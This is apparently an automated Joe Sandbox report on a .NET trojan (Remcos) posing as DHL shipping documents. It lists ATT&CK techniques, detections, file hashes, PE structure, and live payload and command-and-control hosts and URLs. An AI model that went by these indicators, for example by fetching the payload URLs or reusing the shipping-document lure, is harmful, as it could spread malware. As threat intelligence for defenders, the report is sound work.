Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (141); Process Injection (311)
Credential Access: OS Credential Dumping (2); Input Capture (1); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery (1); System Information Discovery (24); Security Software Discovery (111); Process Discovery (1); Virtualization/Sandbox Evasion (141); Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (23); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Alternative Protocol (1); Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus, machine learning and genetic malware detection

Initial sample (source | detection | scanner | label):
DHL Shipping Documents 0016229753_PDF.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos
DHL Shipping Documents 0016229753_PDF.exe | 100% | Avira | HEUR/AGEN.1314412

Dropped files: no antivirus matches
Unpacked PE files: no antivirus matches
Domains: no antivirus matches

URLs (source | detection | scanner | label):
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://investdirectinsurance.com/O~ | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/ | 0% | Avira URL Cloud | safe
https://api.yookassa.ru/v3/ | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/assuence/litesolidCha/Pano.blsC: | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl(t | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl& | 0% | Avira URL Cloud | safe
http://ftp.wapination.net | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/assuence/litesolidCha/Pano.blx | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl~t | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/J~% | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl | 0% | Avira URL Cloud | safe
https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.blwt | 0% | Avira URL Cloud | safe
http://wapination.net | 0% | Avira URL Cloud | safe

Contacted domains (name | IP | active | malicious | antivirus detection | reputation):
wapination.net | 108.179.234.136 | true | true | - | unknown
investdirectinsurance.com | 172.67.189.102 | true | false | - | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | - | unknown
ftp.wapination.net | unknown | unknown | true | - | unknown

Contacted URLs (name | malicious | antivirus detection | reputation):
https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl | false | Avira URL Cloud: safe | unknown
https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl | false | Avira URL Cloud: safe | unknown

URLs from memory and binary data (name | source | malicious | antivirus detection | reputation):
https://investdirectinsurance.com/assuence/litesolidCha/Pano.blx | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ftp.wapination.net | MSBuild.exe, 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp; MSBuild.exe, 00000003.00000002.2592099804.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp; DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp; MSBuild.exe, 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl& | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.yookassa.ru/v3/ | DHL Shipping Documents 0016229753_PDF.exe | false | Avira URL Cloud: safe | unknown
https://investdirectinsurance.com/O~ | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl(t | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://investdirectinsurance.com/assuence/litesolidCha/Pano.blsC: | DHL Shipping Documents 0016229753_PDF.exe | false | Avira URL Cloud: safe | unknown
https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl~t | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://investdirectinsurance.com/ | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://investdirectinsurance.com/J~% | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | MSBuild.exe, 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://wapination.net | MSBuild.exe, 00000003.00000002.2592099804.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.blwt | DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs (IP | domain | country | ASN | ASN name | malicious):
108.179.234.136 | wapination.net | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | true
172.67.189.102 | investdirectinsurance.com | United States | 13335 | CLOUDFLARENET (US) | false

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1486782
Start date and time: 2024-08-02 15:01:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL Shipping Documents 0016229753_PDF.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/3@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 58
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.68.123.157, 192.229.221.95, 13.85.23.206, 72.247.153.162, 72.247.153.178
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: DHL Shipping Documents 0016229753_PDF.exe
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            108.179.234.13695cc26903867ce68cb392ca3fe5ad21e371b8b6b2f1540137d0c6d26e9ca69c7_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Shipping Documents_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeGet hashmaliciousAgentTeslaBrowse
                                  SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeGet hashmaliciousAgentTeslaBrowse
                                    Shipping Documents_pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      Quotation_#432768#_pdf.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        Payment Advice Copy-EUR 5500,00 20240419165413-docx.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          Payment_Advice-pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                            172.67.189.102New _Order_0567___Pdf.exeGet hashmaliciousUnknownBrowse
                                              d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                9B1ZyhsFUq.exeGet hashmaliciousFormBookBrowse
                                                  R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                      41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        investdirectinsurance.comGeron Steel-Order-79376- Contract 2025.exeGet hashmaliciousRemcosBrowse
                                                        • 104.21.65.79
                                                        New _Order_0567___Pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.189.102
                                                        d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.189.102
                                                        Mu7iyblZk8.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.65.79
                                                        9B1ZyhsFUq.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.189.102
                                                        Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.65.79
                                                        R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.189.102
                                                        d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.189.102
                                                        41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                        • 172.67.189.102
                                                        Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.65.79
                                                        fp2e7a.wpc.phicdn.netInvoice GRAFO GROUP MQ 26.07.2024.vbsGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://www.helpministries.ch/2024/08/01/lido-pnto/JEB187438MI50OD11.htmlGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://aka.ms/protectedmessage.Get hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        9rybs.msiGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://pakbutton.com.pk/mailbox/upgrade/25GB/clientGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013Get hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://pakbutton.com.pkGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://pub-fc3b3bfaa8f54a1b8d8485fe0bfe792b.r2.dev/HK.html#christa.claes@daiichi-sankyo.deGet hashmaliciousHTMLPhisherBrowse
                                                        • 192.229.221.95
                                                        https://www.bing.com/ck/a?!&&p=7522cfa299d94e97JmltdHM9MTcyMjQ3MDQwMCZpZ3VpZD0wZjk2ODVjNi05NDg0LTY3YzQtMGM5MS05MTBlOTU3NjY2YzkmaW5zaWQ9NTEzMA&ptn=3&ver=2&hsh=3&fclid=0f9685c6-9484-67c4-0c91-910e957666c9&u=a1aHR0cHM6Ly93d3cuaG4taG5wcmludGVyLmNvbS9pbnRlcm5hdGlvbmFsLWNsaWVudHMv&Get hashmaliciousHTMLPhisherBrowse
                                                        • 192.229.221.95
                                                        https://markeertrafficservicebv6t3etwyghdsbn.dorik.io/Get hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        UNIFIEDLAYER-AS-1USQUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 198.57.247.184
                                                        FfRBfYqF5b.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 162.241.217.213
                                                        qOx3o5Y9mu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 162.241.217.213
                                                        6ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
                                                        • 162.241.148.243
                                                        https://hij.koc.mybluehost.me/Z/Get hashmaliciousUnknownBrowse
                                                        • 162.241.217.57
                                                        https://zjnlm.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=radiouserdadambato.com/dayo/vwxmp/c2N1bWluZ3NAdG1oY2MuY29tGet hashmaliciousHTMLPhisherBrowse
                                                        • 192.185.187.154
                                                        http://www.craft.com.brGet hashmaliciousUnknownBrowse
                                                        • 162.241.62.70
                                                        http://www.coinbase-user-vlogin.tradewindpropertiescr.com/Get hashmaliciousUnknownBrowse
                                                        • 192.185.198.44
Match | Associated Sample Name / URL | Detection | Threat Name | Context
 | https://nym1-ib.adnxs.com/click2?e=wqT_3QKZAfBDmQAAAAMAxBkFAQiIoM-zBhCJo_aKxfvCoioYgeDOtoOlx-YOIIy_9g4omAIwuGg4kQRAuq2d7gFI8opOUABaA1VTRGIBBYhoAXABeJmgZ4ABAIgBAZABApgBBaABAqkBNzgR_dr64z-xAREKLLkBAAAAQDMz_z_BAREUAMkVChzYAY69AuABAA../s=fd215fa3f6c45164ae9790e4c04714dce2356091/bcr=AAAAAAAA8D8=/pp=0.62/bn=0/clickenc=//lilypet.com.br/rarr/jhfhnfknf/aWFuLnJvZ2Vyc0BsbWcubmV0 | malicious | EvilProxy | 192.185.218.163
 | phish_alert_sp2_2.0.0.0 (36).eml | malicious | HTMLPhisher | 192.185.24.172
CLOUDFLARENETUS | DHL 82249910 PDF.exe | malicious | AgentTesla | 104.26.12.205
 | Invoice GRAFO GROUP MQ 26.07.2024.vbs | malicious | Unknown | 188.114.97.3
 | https://its.imagesrs.com/capstonelogistics.com/&adfs/ls/client-request-id=7c724&wa=wsignin10.html | malicious | Unknown | 1.1.1.1
 | https://www.helpministries.ch/2024/08/01/lido-pnto/JEB187438MI50OD11.html | malicious | Unknown | 104.22.51.98
 | QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
 | WcBQ1Er7ys.exe | malicious | DCRat | 104.20.3.235
 | FfRBfYqF5b.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | qOx3o5Y9mu.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | 3wga04wZcP.exe | malicious | MofongoLoader | 188.114.97.3
 | hI1ho6jgmf.exe | malicious | AgentTesla | 104.26.13.205
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
1138de370e523e824bbca92d049a3777 | The Situ Group Ltd.pdf | malicious | HTMLPhisher | 23.206.229.209
 | https://www.ajnr.org/highwire_log/share/reddit?link=https://brandequity.economictimes.indiatimes.com.////etl.php?url=deffarma.com.br/dayo/3hlqt/SEwtUG9ydC1Mb2dpc3RpY3NAY2R3ZS5jb20udHc=$%C3%A3%E2%82%AC%E2%80%9A | malicious | HTMLPhisher | 23.206.229.209
 | https://pub-fc3b3bfaa8f54a1b8d8485fe0bfe792b.r2.dev/HK.html#christa.claes@daiichi-sankyo.de | malicious | HTMLPhisher | 23.206.229.209
 | https://markeertrafficservicebv6t3etwyghdsbn.dorik.io/ | malicious | Unknown | 23.206.229.209
 | https://forms.office.com/e/0Z5hR0x9HM | malicious | Unknown | 23.206.229.209
 | Arts_ Fax MSG2 FAX825534.html | malicious | Unknown | 23.206.229.209
 | http://www.craft.com.br | malicious | Unknown | 23.206.229.209
 | http://www.coinbase-user-vlogin.tradewindpropertiescr.com/ | malicious | Unknown | 23.206.229.209
 | http://project-may1.pages.dev/ | malicious | TechSupportScam | 23.206.229.209
 | http://metaxask-slogin.gitbook.io/ | malicious | Unknown | 23.206.229.209
37f463bf4616ecd445d4a1937da06e19 | 3wga04wZcP.exe | malicious | MofongoLoader | 172.67.189.102
 | uMGZmwaXI2.exe | malicious | BlackMoon | 172.67.189.102
 | 198-211-108-149-32.exe | malicious | CobaltStrike, ReflectiveLoader | 172.67.189.102
 | p2StQYQ4ck.exe | malicious | Vidar | 172.67.189.102
 | Tweak.reg | malicious | LummaC | 172.67.189.102
 | Hv9RA2o5Sg.exe | malicious | FormBook, GuLoader | 172.67.189.102
 | ucb3ojb4XB.exe | malicious | AgentTesla, GuLoader | 172.67.189.102
 | jC5DorvENv.exe | malicious | GuLoader, Lokibot | 172.67.189.102
 | Setup_BOC.5.exe | malicious | Unknown | 172.67.189.102
 | setup_2024#U5e74_7#U6708_26#U65e5.exe | malicious | Unknown | 172.67.189.102
No context

Process: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
File Type: CSV text
Category: dropped
Size (bytes): 425
Entropy (8bit): 5.357964438493834
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5: D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1: 669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256: 91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512: C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

Process: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
File Type: data
Category: dropped
Size (bytes): 238592
Entropy (8bit): 7.199093704147107
Encrypted: false
SSDEEP: 6144:t+dqwNvo2UsXcshR7X3PBjEv3/JCvPNvFcK4Lin832cjifvblc3I:t4v3BjEf8vPvct9jOblCI
MD5: B093592D080675B700E02EAE9A3D6873
SHA1: 565F9E7B6775DDF96B3F2FE3D1ACB0FD2108D27B
SHA-256: 93DA09F48FA60535DBDD8EE6183DFCED516D90599F00FCF1F83ECFF76C1BF9B0
SHA-512: 69376AA69EBE174BE781923A8E923BC7E32367CD344B1AB8A01411EC9F9FFE14BC332C04A77C07057B38ED7323A45BD8DD89B5CE1FEC4CC656115BCB1533A27E
Malicious: false
Reputation: low
Preview: 5.H..h..`......a./d{..(..P.h..`..w...../d{..(w.P.h..`..w...../d..Z.w.q.z..y...I..p...).Soh]....b.RO].....t..$.n<..X..w.....).{.1)u.(.4.`..w.....f.&(w..h..`..w..B../t{...u.P.d..b..w...../d{..(..P.h..`..v...../d{..(..P.X..d..w...../d{..(O.P.h..`..w..B..Yd{...u..h..`..w...../d{..(w@....`..w...../d{..(w.P.h..`..w...../d{..(w.P.h..`..w..... d{..(w.P.h..b......./d{..(.y=...`..r...../3....w.P.h..`..w..../|.)..c.P..`.r...../....(w.P.h..`..o...t}..8.(..P.h.A`..w...../d{..(w.P.h..`.w...../d{..(w.P.t.A`..w.B....d...v.z.j.A`..p...../d{..(w.P.h..`..w...../d{..(w.P.h..`..w...../d6f..G.t..3.X.......K.t........}t.r.P...o...5.....D.....4(.....!z.....d..0.k.[..3...W.r..'...|..6..>.....t[.mW.....C...C....s.q!.R.6....\.q........F...v..}..Y.0..........H........`..w.....md{..(w..h..`......G./d...(..P...`..w.....<d{.K(w......V:...../d...4.fK,.W^.2...gG=.,..~b...T.$..;.F.Y..c.:1....{..(..v.....0...G.. ..@(......We.v.L.n<..HN....O.G..../d...*w.Pwl..`.... .../d{.@(p..l..`

Process: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
File Type: data
Category: dropped
Size (bytes): 15872
Entropy (8bit): 7.408548410413596
Encrypted: false
SSDEEP: 384:Wt4telw/ggBZTLg4OuH8ycTadkRmNt+eytbp:Rh/PBdLg4OW8yIVRmmT
MD5: 26FF44AF70A9D8D74B69D34273720A44
SHA1: E56527FDB71CCCE5DBCBE4D4A310996E6D76603C
SHA-256: 4495098F8B39DE071A9B7DCE3CE7CB0C7DBCDE195A381DD6206A8B6725689F34
SHA-512: 2AAED8731132911763D3032BE3CA2341F0FE3B47D051283524050828EE3D2E4C6F5CA2AA6C6BDD41469026BF868E6CE8E6A19C22F730D6668924FB862BAD7FB8
Malicious: false
Reputation: low
Preview: 5.H..h..`......a./d{..(..P.h..`..w...../d{..(w.P.h..`..w...../d..Z.w.q.z..y...I..p...).Soh]....b.RO].....t..$.n<..X..w.....).{.1)u..u..`..w.....t..(w5P.h..`..w.N.../t{.."w.P.ho.b..w...../d{..(..P.h..`.$w...../d{..(`.P.X..d..w...../d{..(O.P.h..`..w......d{.."w...h..`..w...../d{..(w.P....`..w...../d{..(w.P.h..`..w...../d{..(w.P.h..`..w..... d{..(w.P.h..b......./d{..(.y=...`..w...../.{...w.P.h..`..w..../|.)..c.P....`.Dw...../,{..(w.P.h..`..o...t}..8.(..P.h..`..w..I../d{..(w.P.h..`..\..../d{..(w.P.DR.`..w.B....d....w...h..`..w...../d{..(w.P.h..`..w...../d{..(w.P.h..`..w...../d.A.(..P.j........./U...8w...@.`......hd{...w......p ...W2./d..%(..Q.i.@`...7....P..B.(w...h.`_..r...4._V.B.(w.....`..s.....?V.B.(w.Wjd.........[W{.".L.x.h. 4.....^../.f.c...P..h.j..w..W..pV&F&...P.Od.`.O...4t. ...hL.x.h.`j..w..W.o....x.h. 7$.w..0M./d......P.k`.j..w..2.}Bd{...u.1....H........h.f...w...5)`.....2../d..G)M.I...K..u}.....V..".L.x.h. `._...0.".{......Zo.8.Zw...4./..N.w.0.8..H
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.987397617073519
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: DHL Shipping Documents 0016229753_PDF.exe
File size: 92'672 bytes
MD5: c9bec29f669d714cd80e368748d7024c
SHA1: 26cbf10c3901a2d9d1023daca9d1e70212c52ae6
SHA256: 80c5e03de930503d62103dea57d6590454e442612a394a2b235eb614746e2b3a
SHA512: 6c54c9f682521985ee5f1d1f3f07d50e3d27be09f61bb8b74311f778e2ea023f0b6448c475df8638501df90a3bc0453dd002e00170b9ed35d68e217e037bcf91
SSDEEP: 1536:cglUP1b+o7TnB64EykqIj6ajjKvIbscI1V37bZ+fPtrpmOyT1ELm43QCv6TG:n+tCYnZkqIjjKQYcI1V37QfPHHwyDACi
TLSH: 70930831EFB4826ED6691672F52B47294377C0C93081FBDB4A05B4DE7D0331B9E28AA5
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.f.................f..........V.... ........@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x418456
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x66AC718D [Fri Aug 2 05:41:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00418464h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [ecx+eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+0066AC71h], cl
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax+eax+00h], al
add byte ptr [eax-77FFFE7Ch], cl
add word ptr [eax], ax
push edx
push ebx
inc esp
push ebx
xchg dword ptr [ecx], esi
or bl, dl
push edx
pop ebp
inc esp
mov bh, F5h
mov esp, 672AC6A6h
add dword ptr [eax], eax
add byte ptr [eax], al
inc ebx
cmp bl, byte ptr [ebp+edx*2+73h]
jc 00007F8D3CD39BD6h
pop esp
arpl word ptr [ecx+73h], sp
push 5C74756Fh
inc esp
jnc 00007F8D3CD39BCEh
je 00007F8D3CD39BD1h
jo 00007F8D3CD39BBEh
dec edi
jne 00007F8D3CD39BD6h
jo 00007F8D3CD39BD7h
je 00007F8D3CD39BD5h
pop esp
dec ebp
popad
jp 00007F8D3CD39BD1h
jo 00007F8D3CD39BC8h
bound eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18408 | 0x4c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1846c | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x18464 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x164cc | 0x16600 | feec1aa5499446836e70bd4ef8a75817 | False | 0.3992994937150838 | data | 6.022088554504293 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
